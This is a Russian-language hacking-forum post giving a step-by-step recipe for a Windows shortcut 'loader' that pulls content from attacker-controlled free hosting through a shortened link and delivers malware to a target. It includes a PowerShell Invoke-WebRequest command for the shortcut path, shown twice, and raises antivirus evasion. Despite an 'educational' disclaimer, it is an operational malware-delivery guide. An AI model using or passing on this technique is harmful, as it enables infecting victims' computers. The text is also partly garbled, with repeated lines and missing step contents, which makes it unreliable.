- Lolz
- Автор темы
- Команда форума
- 200
Всем салют, дорогие друзья!
Сегодня я расскажу вам об одном интересном приеме, который, несмотря на свою простоту, используется хакерами в реальных атаках.
В этой статье вы узнаете, как хакеры собственноручно создают лоадер, который, в свою очередь, загружает их вирусы на компьютер цели.
-command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content
Сегодня я расскажу вам об одном интересном приеме, который, несмотря на свою простоту, используется хакерами в реальных атаках.
В этой статье вы узнаете, как хакеры собственноручно создают лоадер, который, в свою очередь, загружает их вирусы на компьютер цели.
- Для начала напомню, что такое лоадер:
Как это работает?
Ну, а теперь, давайте разберемся, как это работает!Дисклеймер: данная статья написана исключительно в образовательных целях. И призвана уберечь читателей от атак подобного типа. Я не несу ответственности за ваши возможные действия и ущерб, который они могут за собой повлечь.
- Первое, что понадобится - это совершенно любой бесплатный хостинг. Для примера я буду использовать 000webhost.com
- Переходим на сайт -> выбираем бесплатный тариф -> проходим стандартную регистрацию:
- Переходим в панель управления и жмём вот так:
- Создаем новый файл:
- Выбираем наш файл и жмём Edit:
- Вставляем в данный файл следующий текст и сохраняем:
- Теперь нам нужно получить ссылку на наш файл. Сделать это очень просто: жмем правой кнопкой мыши по нашему файлу и выбираем View:
- После этого в вашем браузере откроется новое окошко. Перейдите в него и просто скопируйте ссылку из адресной строки браузера:
- Далее идем на сайт сократителя ссылок cuti.cc и вставляем в поле ссылку на .txt файл, который мы создавали выше:
- Отлично, у нас есть сокращенная ссылка. Не теряйте ее.
- Теперь создадим сам ярлык:
- В путь пишем вот это:
- Ярлык-лоадер готов!
Несколько важных моментов
- Наверняка вам интересно, на кой черт используется сокращатель ссылок?
- Как хакеры делают так, чтобы Windows Defender не палил лоадер?
-command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content
- Что делают хакеры, после того, как создали такой ярлык?